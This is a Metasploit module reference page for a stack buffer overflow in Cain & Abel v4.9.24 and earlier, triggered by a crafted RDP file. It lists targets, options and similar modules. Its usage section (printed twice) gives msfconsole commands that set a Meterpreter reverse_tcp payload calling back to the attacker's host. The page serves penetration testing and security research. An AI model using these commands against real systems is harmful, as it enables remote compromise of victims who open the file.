Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Cain & Abel <= v4.9.24 RDP Buffer Overflow
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24 and below. An attacker must send the file to victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
Rank
- Good
Authors
- Trancek < trancek [at] yashira.org >
References
Exploit Targets
- 0 - Windows XP SP2 English (default)
- 1 - Windows XP SP0/1 English
- 2 - Windows XP SP2 Spanish
Development
Similar Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/cain_abel_4918_rdp
msf exploit(cain_abel_4918_rdp) > show payloads
msf exploit(cain_abel_4918_rdp) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(cain_abel_4918_rdp) > set LHOST [MY IP ADDRESS]
msf exploit(cain_abel_4918_rdp) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/cain_abel_4918_rdp
msf exploit(cain_abel_4918_rdp) > show payloads
msf exploit(cain_abel_4918_rdp) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(cain_abel_4918_rdp) > set LHOST [MY IP ADDRESS]
msf exploit(cain_abel_4918_rdp) > exploit
Module Options
| FILENAME | The file name. (default: exploit_cain.rdp) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
